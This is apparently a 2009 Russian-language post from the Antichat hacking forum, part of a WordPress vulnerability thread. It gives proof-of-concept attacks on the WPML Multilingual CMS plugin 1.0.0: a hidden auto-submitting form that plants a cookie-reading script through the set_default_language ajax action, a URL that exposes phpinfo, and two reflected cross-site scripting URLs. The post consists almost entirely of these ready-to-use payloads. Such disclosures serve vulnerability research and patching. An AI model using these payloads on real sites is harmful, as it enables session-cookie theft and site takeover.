[ Обзор уязвимостей WordPress ]

Плагины Wordpress

#11

16.06.2009, 11:34

oRb

Members of Antichat - Level 5

Регистрация: 09.05.2008

Сообщений: 304

С нами: 9477026

Репутация: 2362

Плагины Wordpress

WPML Multilingual CMS
Version: 1.0.0
Last Updated: 2009-6-9
Downloads: 9,424
XSS (PoC)

Код:

<div style="display:none;">
<form action='http://wordpress/wp-content/plugins/sitepress-multilingual-cms/ajax.php?icl_ajx_action=set_default_language' method='post' target="ifr" name="xfrm">
<input name="lang" type="text" value="<script>alert(document.cookie)</script>" />
<input type='submit'>
</form>
<iframe src="" name="ifr" width="1" height="1"></iframe>
<script>
	document.xfrm.submit();
	document.xfrm.lang.value="en";
	setTimeout('document.xfrm.submit()', 1000);
</script>
</div>

PHPINFO

Код:

http://wordpress/wp-content/plugins/sitepress-multilingual-cms/inc/php-version-check.php?icl_phpinfo=1

XSS (register_globals = On)
[CODE]http://wordpress/wp-content/plugins/sitepress-multilingual-cms/menu/language-selector.php?w_this_lang

Код:

="><script>alert(document.cookie)</script>
http://wordpress/wp-content/plugins/sitepress-multilingual-cms/modules/absolute-links/management-page.php?total_posts_pages="><script>alert(document.cookie)</script>

__________________
включи голову